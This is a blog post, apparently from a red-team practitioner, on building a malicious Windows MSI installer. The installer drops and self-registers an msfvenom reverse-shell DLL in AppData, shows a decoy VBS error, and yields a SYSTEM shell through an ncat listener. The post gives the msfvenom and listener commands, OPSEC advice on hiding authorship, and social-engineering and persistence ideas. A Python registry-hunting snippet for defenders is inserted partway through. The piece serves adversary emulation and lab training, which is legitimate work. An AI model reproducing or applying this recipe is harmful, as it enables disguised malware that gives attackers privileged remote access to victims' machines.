Build MSI delivered malware like the cool kids! Everybody’s doing it!
July 16, 2022
I completed an engagement recently where I designed my threat plan around the recent rash of malicious Windows Installer (Microsoft Installer, or MSI) programs. It ended up being a blast, so I wanted to review my methodology for building this type of malware and what it looks like from the defender’s perspective.
I also released a malicious MSI as part of my most recent PMAT Lab update, so this post will probably be a good place to start if you want to tackle that challenge.
Real MSIs Realize Real MS-Lies
^^ I’m extremely proud of that header.
You’re familiar with MSIs if you’ve ever installed anything on Windows. MSI presents the GUI for installing some of your favorite productivity programs, like Napster, uTorrent, or Limewire. Or Notepad++, if you’re a psycho.
It’s a program that looks like this, you know the one:
The basic idea here is to package malware into an MSI and either:
- Have the user install it under the pretense that it’s a legitimate application…
- …have the MSI execute malware as part of the install process and then fabricate some kind of error to reduce suspicion from the user that it’s malware.
Both approaches interest me. They share the same general setup and produce the same end result, but they differ slightly in approach. We’ll examine the method outlined in the second bullet point.
Let’s look at an example that we can try to emulate:
The original tweet by proxylife has the high-level chain of execution, while the reply from Germán Fernández shows some details that we can use to improve the fidelity of emulation. Let’s get to work!
Emulation Station: Building an MSI
How do we build one of these things?
First, you’ll need Visual Studio.
Visual Studio 2022 | Download for free
I’m using VS 2022, but I have used VS 2019 in the past and this technique has worked out fine.
Once you have VS set up, we need to install an extension so we can build MSIs. Go find the Microsoft Visual Studio Installer Projects extension for the version of VS that you have. I’m using VS 2022, so I’m using the extension for 2022:
Microsoft Visual Studio Installer Projects 2022 - Visual Studio Marketplace
Download, double-click, and run the extension installer. If all goes well, restart VS and you should now have the option to build Setup Projects.
Select the Setup Project option and name it something inconspicuous:
The UI for the Setup Project is a lot different than the normal VS UI. There’s not much in the way of coding to be done here. Instead, you now have a set of installation directories:
On the right side of VS, the project can be built like any other VS solution. We’ll add the files that we want installed, tell the installer where to drop them during installation, add some custom actions 😲 to do our dirty work, and then build the dang thing as a pre-packaged installer of evil. 😈😈😈
Let’s revisit the emulation plan and take a look at the contents of the MSI:
(better pictures are available in the original tweet above ⬆️ )
The MSI contains a DLL, a .VBS file, and a few custom actions to execute. Let’s knock out the composite elements first and then set up the custom actions.
MsgBox "Error fam lmao", 16, "Somethin broke yo"
This part is trivial. Save this as a .vbs and check that it runs by invoking it with
> wscript.exe vbc_notify.vbs
We need a malicious DLL. Let’s keep it simple and use a Windows reverse shell that connects back to the localhost on port 8443.
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=127.0.0.1 lport=8443 -f dll > dll_main.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 8704 bytes
Once this is compiled, let’s test it to ensure the mechanics of the exploit are working as intended:
Now, let’s wrap these two composite elements up into our malicious installer. To do this, go to our project in VS and select the location where we want our installer to actually drop the files. The tweet references where the files are installed in the real sample:
regsvr32.exe -n -i:"Install" C:\Users\**\AppData\Local\AdobeFontPack\main.dll
Let’s use the AppData directory for our emulation. We can add this as a location by right clicking in the left-side pane and selecting
Add Special Folder -> User's Application Data Folder
Once the AppData directory is added to the list of available install locations, right-click on it and select
Add -> Files
Here, we add all of the composite elements of this exploit chain to the installer. Add the .VBS and dll_main.dll here.
Right now, nothing will happen when we run the installer after the DLL and .VBS are dropped into %APPDATA%. We now need to add some custom actions to complete the exploit chain. And this is where things get downright insidious.
First, go to dll_main.dll in the Solution Explorer panel (right-side). The sample installer calls regsvr32.exe to register the DLL when installed for execution. We can set the DLL to self-register during install by selecting the
Now, right-click on the Project file (not the Solution file, but the thing one level under it) in the Solution Explorer and go to View -> Custom Actions (personally, I think this is a weird place for it, but whatevs):
We can make the decoy vbc_notify.vbs script run by adding it as a Custom Action to the Install folder:
Now when this program runs, it will:
- Unpack both resources into %APPDATA%
- Self register (i.e., execute) the DLL
- Run vbc_notify.vbs and pop up a decoy message
- And, exit the installer!
Before compiling, make sure to change some of the Misc details like the Author and Company Name to preserve OPSEC. Select the Build Project file and change the settings in there:
Compile this into an MSI by right-clicking the Solution file and clicking “Build Solution”. If all has gone to plan, you should now have an MSI in the Debug or Release directory, depending on which build you selected:
Debug is fine for testing and demo purposes. Release is better in an OPSEC sense.
Eff Around Complete - Initiating “Find Out” Protocol
Start up your ncat listener:
> ncat.exe -nvlp8443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443
VS gives us a few options to run the actual installer: a standalone MSI and an executable. The MSI can be run by itself with no problems. If you use the setup executable, make sure to keep the MSI alongside it. If you separate the two files, you’ll get an error. Can’t have that!
This is because the setup.exe application appears to be a wrapper around the actual installer. When the application is run, the MSI kicks off as a child process:
In any case, run the MSI or the installer and follow the prompts:
At some point in this install, you may have to accept a UAC prompt to ensure that you’re OK with a program making changes to your computer. Imagine that the user is a local admin on their own host. Or maybe they call up their IT admin and ask them to install the program because it’s an important business program.
Hey, there’s our decoy script! One interesting thing to note here is that the .VBS file is not forked into a new process. There is no new process as a child of any MSI process in the process tree:
We see that the vbc_notify.vbs script has been registered as a COM object in the registry and can now be called by CLSID, which points it to the location on disk:
This ends up in the memory space of the new msiexec.exe, almost like a pseudo process injection 🤔 :
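From the defender’s side, that registry footprint is the thing to hunt for: a CLSID whose InprocServer32 points at a DLL sitting in a user profile. The following is an added example and not code from the original post. It parses a constructed `reg export` style dump (the CLSIDs, the `alice` profile and the dump text are all made up for the example) and flags in-process servers registered from user-writable locations.

```python
# Added example (not code from the original post): parse a `reg export`
# style dump and flag COM in-process servers whose DLL lives under a user
# profile, the footprint left by a self-registered DLL in %LOCALAPPDATA%.
# The CLSIDs, the "alice" profile and the dump itself are constructed.
import re

CLSID_INPROC_KEY = re.compile(
    r"^\[HKEY_(?:CLASSES_ROOT|LOCAL_MACHINE\\SOFTWARE\\Classes|CURRENT_USER\\SOFTWARE\\Classes)"
    r"\\CLSID\\(\{[0-9A-F-]{36}\})\\InprocServer32\]$", re.I)
DEFAULT_VALUE = re.compile(r'^@="(.*)"$')
USER_PROFILE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\", re.I)

def parse_inproc_servers(reg_text: str) -> dict:
    """Return {CLSID: dll_path} for every InprocServer32 key in a .reg dump."""
    servers, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):                 # a new key starts a new section
            m = CLSID_INPROC_KEY.match(line)
            current = m.group(1).upper() if m else None
        elif current is not None:
            m = DEFAULT_VALUE.match(line)
            if m:                                # .reg files double each backslash in strings
                servers[current] = m.group(1).replace("\\\\", "\\")
    return servers

def suspicious_servers(servers: dict) -> dict:
    """COM servers whose DLL is stored in a user-writable profile directory."""
    return {clsid: path for clsid, path in servers.items() if USER_PROFILE.match(path)}

# Constructed dump: one server registered from AppData, one from System32.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}]
@="AdobeFontPack Helper"

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\AdobeFontPack\\main.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-0000-0000-0000-000000000002}\InprocServer32]
@="C:\\Windows\\System32\\vendor.dll"
"ThreadingModel"="Apartment"
"""

if __name__ == "__main__":
    for clsid, path in suspicious_servers(parse_inproc_servers(SAMPLE_REG)).items():
        print(f"{clsid} -> {path}")
```

To run this against a real host, export `HKCR\CLSID` with `reg export` and read the file with `encoding="utf-16"`, since the Version 5.00 format is written as Unicode. Expanding `%LOCALAPPDATA%` style values (stored as `hex(2)` in a .reg file) is left out here; the rule above only covers plain string paths.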
And if you check the ncat listener:
Accepting the UAC prompt means that this process has been executed with admin privileges. And Windows has taken that a step further and bumped us up to SYSTEM level. Yikes!
You can imagine how dangerous this can be with a bit of social engineering.
The resulting process relationship is interesting.
Rundll32 is used to open the resulting cmd.exe window and spawn the shell:
Important to note here is that this instance of rundll32 does not spawn as a child of explorer.exe. Rundll32 is a contentious topic in the OPSEC realm, so I’ll leave it up to you to decide if you’re ok with the OPSEC implications of this.
But also remember that there is tons of room for creativity with this technique. Do you install an application in the User Application Directory and then make a shortcut in the Startup Folder? Do you make some choice registry changes with nefarious intention? The sky is the limit.
I think that’s enough for today!